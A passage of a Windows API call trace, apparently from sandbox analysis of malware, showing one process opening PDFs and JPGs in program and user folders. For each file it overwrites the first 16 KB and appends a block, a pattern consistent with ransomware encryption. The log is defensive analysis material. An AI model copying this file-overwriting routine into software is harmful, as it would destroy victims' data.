nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.100] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0064.100] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.100] CloseHandle (hObject=0x1ec) returned 1 [0064.109] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0064.109] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.109] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1c4f5 [0064.110] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.110] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.110] ReleaseMutex (hMutex=0x168) returned 1 [0064.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x1f7364c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Standard.pdf", lpUsedDefaultChar=0x0) returned 12 [0064.110] ReadFile (in: hFile=0x1ec, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.120] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1b4f5 [0064.120] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.124] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1b4f5 [0064.124] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.124] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0064.124] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.124] CloseHandle (hObject=0x1ec) returned 1 [0064.468] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0064.469] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.469] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa85d [0064.469] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.469] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.569] ReleaseMutex (hMutex=0x168) returned 1 [0064.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0064.570] ReadFile (in: hFile=0x1ec, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.576] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x985d [0064.576] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea7988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.576] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x985d [0064.576] WriteFile (in: hFile=0x1ec, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.576] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0064.576] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.577] CloseHandle (hObject=0x1ec) returned 1 [0064.578] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\pointers.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0064.579] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.579] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb731 [0064.579] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.579] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.579] ReleaseMutex (hMutex=0x168) returned 1 [0064.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x1f7362c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pointers.pdf", lpUsedDefaultChar=0x0) returned 12 [0064.579] ReadFile (in: hFile=0x1ec, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.596] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa731 [0064.596] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.661] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa731 [0064.661] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.661] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0064.662] WriteFile (in: hFile=0x1ec, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.662] CloseHandle (hObject=0x1ec) returned 1 [0064.663] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0064.664] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.664] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa6a0 [0064.664] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.664] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.664] ReleaseMutex (hMutex=0x168) returned 1 [0064.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0064.664] ReadFile (in: hFile=0x1ec, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.671] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x96a0 [0064.671] ReadFile (in: hFile=0x1ec, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.686] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x96a0 [0064.686] WriteFile (in: hFile=0x1ec, lpBuffer=0x2664b68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2664b68*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.687] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0064.687] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.687] CloseHandle (hObject=0x1ec) returned 1 [0064.688] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0064.689] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.689] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x18b15 [0064.689] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.689] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.689] ReleaseMutex (hMutex=0x168) returned 1 [0064.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0064.689] ReadFile (in: hFile=0x1ec, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.725] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x17b15 [0064.725] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.726] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x17b15 [0064.726] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.727] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0064.727] WriteFile (in: hFile=0x1ec, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.727] CloseHandle (hObject=0x1ec) returned 1 [0064.732] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\Oz5qK1HKQ0at4YOJKs.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ls gbmc\\oz5qk1hkq0at4yojks.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0064.732] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.733] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x18d27 [0064.733] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.733] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.733] ReleaseMutex (hMutex=0x168) returned 1 [0064.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Oz5qK1HKQ0at4YOJKs.pdf", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0064.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Oz5qK1HKQ0at4YOJKs.pdf", cchWideChar=22, lpMultiByteStr=0x1f88d34, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Oz5qK1HKQ0at4YOJKs.pdf", lpUsedDefaultChar=0x0) returned 22 [0064.733] ReadFile (in: hFile=0x1ec, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.734] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x17d27 [0064.734] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.734] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x17d27 [0064.735] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.736] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0064.736] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.736] CloseHandle (hObject=0x1ec) returned 1 [0064.975] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.217] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0065.218] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x127e [0065.227] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0065.227] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.227] ReleaseMutex (hMutex=0x168) returned 1 [0065.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShadesOfBlue.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0065.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShadesOfBlue.jpg", cchWideChar=16, lpMultiByteStr=0x1f88bcc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShadesOfBlue.jpg", lpUsedDefaultChar=0x0) returned 16 [0065.228] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x127e, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f2bc*=0x127e, lpOverlapped=0x0) returned 1 [0065.257] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0065.257] WriteFile (in: hFile=0x1dc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1806, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1806, lpOverlapped=0x0) returned 1 [0065.257] CloseHandle (hObject=0x1dc) returned 1 [0065.259] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.259] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0065.259] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x5d3f [0065.259] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0065.259] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.260] ReleaseMutex (hMutex=0x168) returned 1 [0065.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.jpg", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0065.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.jpg", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Garden.jpg", lpUsedDefaultChar=0x0) returned 10 [0065.260] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.262] SetFilePointer (in: 